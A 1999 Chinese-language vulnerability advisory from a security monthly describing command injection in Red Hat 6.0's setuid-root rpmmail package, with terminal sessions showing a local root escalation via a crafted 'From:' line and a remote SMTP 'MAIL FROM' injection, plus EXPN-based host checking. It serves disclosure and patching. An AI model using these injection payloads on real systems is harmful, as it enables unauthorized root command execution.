首页 -> 安全研究

安全研究

绿盟月刊
绿盟安全月刊->第2期->最新漏洞
期刊号: 类型: 关键词:
Red Hat 6.0最新rpmmail本地/远程漏洞

整理:rocky
日期:1999-10-15


    在Red Hat 6.0的附加CD中,有一个软件包,叫作rpmmail package。安装后的rpmmail存在严重的ROOT级的漏洞。此漏洞可能会使远程/本地的普通用户获得ROOT权,或以"nobody"身份远程执行任意指令。

    给rpmmail@vulnerablehost发送一封e-mail,可以使/home/rpmmail/rpmmail (默认设置为suid root, 能由.forward远程执行)向system(3)执行任何你所希望的指令。指令的执行并不一定需要ROOT权限,因为bash's handling of euid != uid of caller。虽然system(3)调用/bin/sh -c,但在某些linux系统的默认设置下,比如SuSE 6.2,其被联结至/bin/bash v2。从system(3)连机手册可知,此漏洞在/bin/sh为bash version 2的系统中无效,因为自bash version 2开始,/bin/sh在启动时,取消了原来所具有的特殊权限。因此,一些安装了rpmmail的系统存在 远程/本地ROOT 漏洞。所有没有特殊权限others组的用户都可以远程执行指令。

本地漏洞如下:

/bin/sh is linked to /bin/bash (default SuSE 6.2 behavior:
bash-2.03$ ls -la /bin/sh
lrwxrwxrwx 1 root root 9 Oct 5 11:27 /bin/sh -> /bin/bash
bash-2.03$ cat /etc/SuSE-release;uname -a;id
SuSE Linux 6.2 (i386)
VERSION = 6.2
Linux fear62 2.2.10 #1 Tue Jul 20 16:32:24 MEST 1999 i686 unknown
uid=100(xnec) gid=100(users) groups=100(users)
bash-2.03$ echo "From: ;/usr/bin/id;" | /home/rpmmail/rpmmail -c bah
Could not open config file!
sh: Y: command not found
uid=100(xnec) gid=100(users) groups=100(users)
Could not open acknowledge file!
bash-2.03$

----

After linking /bin/sh to /bin/ksh instead:

bash-2.03$ ls -la /bin/sh
lrwxrwxrwx 1 root root 8 Oct 5 11:09 /bin/sh -> /bin/ksh
bash-2.03$ cat /etc/SuSE-release;uname -a;id
SuSE Linux 6.2 (i386)
VERSION = 6.2
Linux fear62 2.2.10 #1 Tue Jul 20 16:32:24 MEST 1999 i686 unknown
uid=100(xnec) gid=100(users) groups=100(users)
bash-2.03$ echo "From: ;/usr/bin/id;" | /home/rpmmail/rpmmail -c bah
Could not open config file!
sh: Y: not found
uid=100(xnec) gid=100(users) euid=0(root) egid=0(root) groups=100(users)
Could not open acknowledge file!
bash-2.03$


远程漏洞如下:

bash-2.03$ telnet localhost 25
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 fear62 Smail-3.2 (#1 1999-Jul-23) ready at Tue, 5 Oct 1999 11:31:13 -0500
(CDT)
MAIL FROM: ;/command/to/execute;
250 <;/command/to/execute;> ... Sender Okay
RCPT TO: rpmmail
250 ... Recipient Okay
data
354 Enter mail, end with "." on a line by itself
.
250 Mail accepted
quit

对有此项漏洞主机的确认非常简单,可以通过EXPN命令来校验.forward是否存在:

220 fear62 Smail-3.2 (#1 1999-Jul-23) ready at Tue, 5 Oct 1999 11:38:44 -0500
(CDT)
EXPN rpmmail
250 "| /home/rpmmail/rpmmail -c /home/rpmmail/rpmmail.conf"

解决方法:
    到http://www.redhat.com站点寻找最新的漏洞补丁。

版权所有,未经许可,不得转载